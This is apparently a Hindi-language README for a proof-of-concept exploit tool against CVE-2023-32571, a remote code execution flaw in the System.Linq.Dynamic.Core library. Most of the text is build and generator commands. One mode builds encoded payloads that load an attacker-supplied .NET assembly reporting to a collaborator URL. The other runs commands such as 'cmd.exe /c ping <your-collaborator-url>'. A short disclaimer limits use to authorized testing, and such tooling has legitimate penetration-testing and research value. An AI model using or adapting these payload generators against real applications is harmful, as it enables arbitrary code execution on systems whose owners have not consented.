
CVE-2023-32571 के लिए प्रूफ ऑफ कॉन्सेप्ट
CVE-2023-32571 के लिए प्रूफ ऑफ कॉन्सेप्ट, जो System.Linq.Dynamic.Core (1.0.7.10 से 1.2.25) में एक रिमोट कोड निष्पादन भेद्यता है। यह भेद्यता हमलावरों को मनमाना कोड और कमांड निष्पादित करने की अनुमति देती है जब Where, Select, OrderBy सहित विधियों में अविश्वसनीय इनपुट पार्स किया जाता है।
यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। पूर्व पारस्परिक सहमति के बिना लक्ष्यों पर हमला करने के लिए इस टूल का उपयोग अवैध है। डेवलपर्स कोई दायित्व नहीं लेते हैं और इस प्रोग्राम के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
dotnet build --configuration Release
Payload/bin/Release/netstandard2.0/Payload.dll पर पेलोड DLLGenerator/bin/Release/net9.0/Generator.dll पर पेलोड जनरेटरयह टूल दो मोड का समर्थन करता है:
# Using Base64 encoding
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 1
# Using Hex encoding
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 0
# Using Base64 encoding
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 1
# Using Hex encoding
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 0
# Windows command execution
./Generator --mode 1 --parameters "cmd.exe /c ping <your-collaborator-url>"
# Linux command execution
./Generator --mode 1 --parameters "bash -c ping <your-collaborator-url>"
--mode: शोषण मोड (0=AssemblyLoad, 1=ProcessStart)--file: लोड करने के लिए .NET असेंबली का पथ (AssemblyLoad मोड के लिए आवश्यक)--type: इंस्टैंशिएट करने के लिए पूर्ण योग्य प्रकार का नाम (AssemblyLoad मोड के लिए आवश्यक)--parameters: मोड के आधार पर पैरामीटर:
--encoding: AssemblyLoad मोड के लिए एन्कोडिंग विधि (0=Hex, 1=Base64)